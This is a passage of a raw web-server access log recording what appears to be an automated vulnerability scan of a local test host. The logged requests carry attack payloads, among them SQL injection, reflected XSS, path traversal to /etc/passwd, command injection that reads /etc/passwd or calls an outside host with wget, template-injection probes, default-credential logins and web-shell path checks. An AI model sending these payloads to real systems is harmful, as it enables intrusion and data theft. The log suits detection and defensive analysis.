Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mrtg/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/start/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBAf0FuaCgAb7VcBA!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.091","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/static/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.158","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.096","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/whoami HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/69 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.zul HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/systemstatus_remote.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MRTG/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/admin-guide/test.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vpn/../vpns/cfg/smb.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.093","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"ant=echo md5(\x22antproxy.php\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.antproxy.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../297MbAQWseeNyonUDKMuaENaRcI.txt&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /HelpTheHelpDesk.jsdbx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\x22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"username=apollo&password=admin&login-submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /signin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/signin?", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"target_addr=\x221.1.1.1+`wget+http%3A%2F%2Fc9v8hn0smpv8c57g0t00tyrjsd14wystc.oast.live%2F`\x22&waninf=127.0.0.1\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boaform/admin/formTracert HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/diag_ping_admin_en.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/ALFA_DATA/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /templates/editor-preload-container HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MbAQWseeNyonUDKMuaENaRcI.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.008","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /ui_base/js/..%2f..%2f..%2f..%2fsettings.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.005","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 